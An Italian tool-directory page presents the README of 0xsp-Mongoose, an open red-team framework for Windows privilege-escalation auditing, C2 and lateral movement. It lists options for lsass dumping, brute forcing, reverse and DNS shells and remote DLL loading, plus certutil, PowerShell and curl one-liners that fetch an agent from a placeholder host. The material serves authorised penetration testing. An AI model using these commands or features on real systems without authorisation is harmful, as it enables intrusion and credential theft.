Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
0xsp-Mongoose — un framework unico per la simulazione di cybersicurezza e operazioni di red team, auditing di Windows per vulnerabilità più recenti, configurazioni errate e attacchi di escalation dei privilegi, replica delle tattiche e delle tecniche di un avversario avanzato in una rete. | Kitploit
Strumenti/GitHubGitHub/zux0x3a/0xsp-mongoose
Escalation di PrivilegiScanner di VulnerabilitàMappatura della ReteAttacchi alle PasswordExploitMovimento LateraleSfruttamento di Applicazioni WebPost-ExploitCommand and ControlRed TeamingAnalisi DNSArchived
5341174 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
GitHubzux0x3a/0xsp-mongoose

0xsp-Mongoose

un framework unico per la simulazione di cybersicurezza e operazioni di red team, auditing di Windows per vulnerabilità più recenti, configurazioni errate e attacchi di escalation dei privilegi, replica delle tattiche e delle tecniche di un avversario avanzato in una rete.

Vedi RepositorySito web

GPLv3 license

Supporta il progetto per lo sviluppo continuo (ETH 0xf340c15c5e669a4ababab856e9f2bccd659d6e42)

0xsp Mongoose RED per Windows

Versione corrente 2.2.0

La versione 0xsp mongoose red è fornita per assistere le vostre esigenze durante la simulazione di sicurezza informatica; utilizzando questa versione sarete in grado di eseguire un audit di un sistema operativo Windows target per vulnerabilità di sistema, configurazioni errate e attacchi di escalation dei privilegi, e replicare le tattiche e le tecniche di un avversario avanzato in una rete.

Con il supporto Node.js per l'API dell'applicazione web, l'installazione e la personalizzazione diventano molto più rapide; l'agente sensore Windows comunicherà con l'API dell'applicazione per trasferire i risultati e ricevere comandi come tecnica bidirezionale.

l'agente è in grado di identificare e rilevare exploit di Windows utilizzando i moduli windows update api e exploit database definitions; la nuova versione rileverà anche le seguenti vulnerabilità.

  • CVE-2019-0836
  • CVE-2019-0841
  • CVE-2019-1064
  • CVE-2019-1130
  • CVE-2019-1253
  • CVE-2019-1385
  • CVE-2019-1388
  • CVE-2019-1405
  • CVE-2019-1315
  • CVE-2020-0787
  • CVE-2020-0796
  • CVE-2020-0797
  • CVE-2020-1472
  • CVE-2021-1675

Caratteristiche

  • Tecniche di scansione per escalation dei privilegi di Windows.
  • Applicazione web costruita con NodeJS
  • Supporto per database SQLite
  • Tecniche di movimento laterale. video
  • Canale di comunicazione bidirezionale. video
  • Pacchettizzazione online dei plugin.
  • Motore di scripting migliorato per il rilevamento di exploit.
  • Modulo di brute force degli account Windows (Locale / Dominio)
  • Weaponizzazione della funzione API Windows run-as-user. Video
  • Scansione della rete locale ed enumerazione delle condivisioni.
  • Tecnica di dump della memoria lsass (plugin).
  • Shell interattiva DNS C2C

installazione

root@kitploit:~
git clone --single-branch --branch 0xsp-red https://github.com/lawrenceamer/0xsp-mongoose 
cd 0xsp-mongoose/ 
npm install 
node index.js

credenziali di accesso predefinite:

  • username: admin
  • password: 0xsp

Script Python DNS C2C

root@kitploit:~
touch temp.txt
python3 dns_server.py -d DOMAIN -a PUBLICIP -i INTERFACEIP

Distribuzione rapida dell'agente

root@kitploit:~
#example 1 
curl.exe -o agent.exe http://nodejsip:4000/release/x64.exe
#example 2 
powershell.exe -command (new-object net.webclient).downloadfile('http://nodejsip:4000/release/x64.exe','c:\tmp\agent.exe');
#example 3 
certutil.exe -urlcache -split -f "http://nodejsip:4000/release/x64.exe" agent.exe

Utilizzo

root@kitploit:~
-s --recupera i servizi Windows e i driver installati.
-u --recupera informazioni su utenti, gruppi, ruoli.
-c --cerca nei driver connessi file di configurazione sensibili per estensione.
-n --recupera informazioni di rete, interfacce di rete, dettagli di connessione.
-w --enumera directory scrivibili, controllo permessi di accesso, permessi modificati.
-i --enumera informazioni di sistema Windows, sessioni, controllo Always Elevated.
-l --cerca in qualsiasi file una stringa specifica, es: agent.exe -l c:\ password *.config.
-o --specifica l'indirizzo host dell'applicazione Node.js, puoi usare anche srvhost
-p --enumera software installati, processi in esecuzione, attività.
-e --strumento di ispezione del kernel, aiuterà a cercare nei database degli strumenti le vulnerabilità del kernel Windows.
-x --password per autorizzare la connessione con l'applicazione Node.js.
-d --scarica file direttamente nella macchina target.
-t --carica file dalla macchina target nell'applicazione Node.js.
-spooler --scansiona un singolo host o una lista di host per il possibile CVE-2021-1675 (es. -spooler -srvhost o -spooler -hosts )
-m --esegue tutti i tipi di scansione conosciuti insieme.

[!] SEZIONE TATTICHE RED TEAMING

-r --avvia una reverse shell con un account specifico.
-lr --tecnica di movimento laterale usando WMI (es. -lr -host 192.168.14.1 -username administrator -password blabla -srvhost nodejsip )
-nds --scoperta della rete ed enumerazione delle condivisioni
-dns --stabilisce shell interattiva DNS C2C
-cmd --trasferisce comandi tramite HTTP Shell
-interactive --avvia la modalità interattiva (es: caricamento plugin, ecc.)
-username --autenticazione identità per moduli di attacco specifici.
-password --autenticazione identità per moduli di attacco specifici.
-host --identifica l'host remoto su cui condurre un attacco.
-srvhost --imposta l'rhost dell'applicazione Node.js.
-bf --modulo di brute force per utenti locali / di dominio
-import --importa ed esegue file DLL localmente
-remote --importa ed esegue file DLL da un host remoto

Documentazioni

https://0xsp.com/security%20dev/0xsp-mongoose-red

Sito di ricerca dettagliato

https://0xsp.com

Conferenze sulla sicurezza

  • Standoff365 - Russia (https://standoff365.com/conferences/357)

Tutorial dello strumento

Assicurati di iscriverti al seguente canale per essere avvisato quando vengono pubblicati nuovi tutorial e trucchi per 0xsp https://www.youtube.com/channel/UCoEr6Qsyd6oMsPmaJPQ_FOg

Scarica lo strumento